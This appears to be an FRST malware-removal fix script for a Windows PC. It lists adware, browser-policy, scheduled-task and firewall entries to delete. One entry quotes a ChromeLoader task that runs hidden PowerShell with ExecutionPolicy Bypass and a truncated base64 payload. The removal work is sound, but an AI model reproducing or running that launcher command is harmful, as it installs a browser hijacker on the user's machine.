CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction 
HKLM\SOFTWARE\Policies\Google: Restriction 
Task: {BCFD0FC1-48CF-40A2-B4F8-53BA5EBD8CF5} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'Ã©lÃ©ment de donnÃ©es a 4315 caractÃ¨res en plus). 
S2 SecurityService; C:\Program Files (x86)\TotalAV\SecurityService.exe [264032 2021-11-09] (Protected Antivirus Limited -> TotalAV) 
R1 webshieldfilter; C:\Windows\System32\drivers\webshieldfilter.sys [96264 2021-11-09] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (Pas de fichier)
HKU\S-1-5-21-1386259266-836039534-2927133994-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (Pas de fichier)
Task: {0095FA72-A416-458A-BDB2-7442D170C6CD} - System32\Tasks\Opera scheduled Autoupdate 1637158177 => C:\Users\Sapnas\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
Task: {A390320C-E533-479C-AEB7-0941C6F6F71F} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1386259266-836039534-2927133994-500 => C:\Users\Sapnas\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (Pas de fichier)
Task: {A6E6B4A9-F4D7-4341-9D43-A24EF343474A} - System32\Tasks\PC Cleaner automatic scan and notifications => C:\Program Files (x86)\PC Cleaner\PCCNotifications.exe (Pas de fichier)
Task: {E54C31FB-E255-4704-9139-858428A47613} - System32\Tasks\Opera scheduled Autoupdate 1638040950 => C:\Users\Sapnas\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
S2 Wallpaper Engine Service; "C:\Users\Sapnas\OneDrive\Bureau\Wallpaper Engine\bin\wallpaperservice32_c.exe" [X]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [10304]
SearchScopes: HKU\S-1-5-21-1386259266-836039534-2927133994-1001 -> DefaultScope {BAF72C54-BB04-4E7A-9220-288FDBCE2923} URL = 
FirewallRules: [{BFB12879-FFA2-42CB-8EA0-DDA29E8B077D}] => (Allow) C:\Users\Sapnas\AppData\Local\Programs\Opera\81.0.4196.54\opera.exe => Pas de fichier
FirewallRules: [{1FA1DA51-E1D0-47DF-A597-71607DF1B1EE}] => (Allow) C:\Program Files\NewBlueFX\VegasStream\VEGAS Stream.exe => Pas de fichier
FirewallRules: [{1B4CB410-FDB3-4752-993E-C0EA2671BE90}] => (Allow) C:\Program Files\NewBlueFX\TitlerLive\TitlerLiveStandalone.exe => Pas de fichier
FirewallRules: [{D2D756B6-2602-4C68-A03F-16B2FF4503CD}] => (Allow) C:\Program Files\NewBlueFX\Common\EffectHost64.exe => Pas de fichier
FirewallRules: [{1B429766-7BF9-46F7-A979-C03D12F5BF71}] => (Allow) C:\Users\Sapnas\AppData\Local\Programs\Opera\81.0.4196.60\opera.exe => Pas de fichier
C:\Windows\system32\Tasks\PC Cleaner automatic scan and notifications
2021-12-15 13:08 - 2021-12-15 13:17 - 000000000 ____D C:\ProgramData\PC Cleaner
2021-12-15 13:04 - 2021-12-15 13:05 - 006780568 _____ (PC Helpsoft ) C:\Users\Sapnas\Downloads\PC_Cleaner.exe
CHR HomePage: Default -> hxxps://fr.search.yahoo.com/yhs/web?hspart=omr&hsimp=yhs-001&type=88fptxqjxp1acegikmwv4002320Â¶m1=y6bdVFVIsvuYsgEClQfz8Gt8Oby4iBdjLq7%2Fysk4Phe5sV980wpeWqTlm5o9JII7F5WVzyh7Xaojy%2BWN%2B9EtjqXiBezc%2BW8YlKiUzim9pRwmuLNk5kuD9qwmuk%2F2qnz8Vq%2BXskLMekdpf2pB8ndwFpqi%2FiDlor0rj15tIYLZCXFjQuiNErUAT1O2mOAGRRRo2qA1w3Y750fcZXpJlNAudL67nCpH8aJ4LwqhQx4B2hM%2FKckbjZR5MidsOMdeRckSVkkqs4fwIR1yYbrX8M3V0kMKdeo7Qcgta%2BUkDDLrBV162AlpPZTG7n5hUkWAI5dgBofubX1tBNdVMpTH7j%2FGJaiNOb96Nac2t3Kb%2BX0TiE2YWfDT8SV3Gg3zZkSB90a5IuuyJ0aFZ0JUzOOZBVipAg%3D%3D
C:\Windows\nl.exe
C:\Users\Sapnas\Downloads\Multi FH5 (1).rar
Hosts:
EmptyTemp: